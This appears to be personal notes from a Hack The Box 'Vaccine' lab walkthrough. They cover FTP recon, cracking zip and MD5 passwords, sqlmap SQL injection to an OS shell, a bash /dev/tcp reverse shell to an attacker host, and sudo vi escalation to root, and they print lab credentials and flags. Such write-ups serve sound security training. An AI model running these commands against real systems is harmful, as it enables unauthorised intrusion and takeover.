notes.md

[HTB] Vaccine

recon

• nmap scan

  • cmd: nmap -sC -sV -A -o nmap.log <Target-IP>
  • p21, p22 & p80 are open
  • on p21 anonymous ftp login allowed

• found backup.zip in ftp, it is password protected

• p80 hosts a website, MegaCrop Login page

hacking

• cracked zip file password using john the ripper

  • zip2john backup.zip > backup_pwd.hash
  • john backup_pwd.hash -wordlist=/usr/share/wordlists/rockyou.txt
  • john --show backup_pwd.hash
  • password: 741852963

• unzipped the file

  • found index.php & style.css
  • found website login creds, but pwd is in MD5 format (in index.php)
    • admin:2cb42f8734ea607eefed3b70af13bbd3
  • password:qwerty789 (crackstation)

• logged in on <IP>'s website

  • redirected to /dashboard.php
  • found param /dashboard.php?search=

• using sqlmap

  • cmd: sqlmap -u "http://<Target-IP>/dashboard.php?search=" --cookie="PHPSESSID=5naq63b4fai8cobfeikbacjc21" --os-shell --batch
  • got a shell on system!

• currently we are postgres user

  • getting reverse shell
    • nc -lvnp 4444 (attacker's machine)
    • bash -c "bash -i >& /dev/tcp/<Attacker-IP>/4444 0>&1" (os shell)
    • successfully got reverse shell!
  • enumerating system
    • found user:simon
    • found /var/lib/postgresql/user.txt > ec9b13ca4d6229cd5cc1e09980965bf7

• privesc

  • found sensitive infomation in /var/www/html/dashboard.php
    • $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
  • using these creds, access machine using ssh
  • sudo -l > /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • getting root shell
    • sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
    • :shell

• currently we are root user

  • found /root/root.txt > dd6e058e814260bc70e9bbdef2715849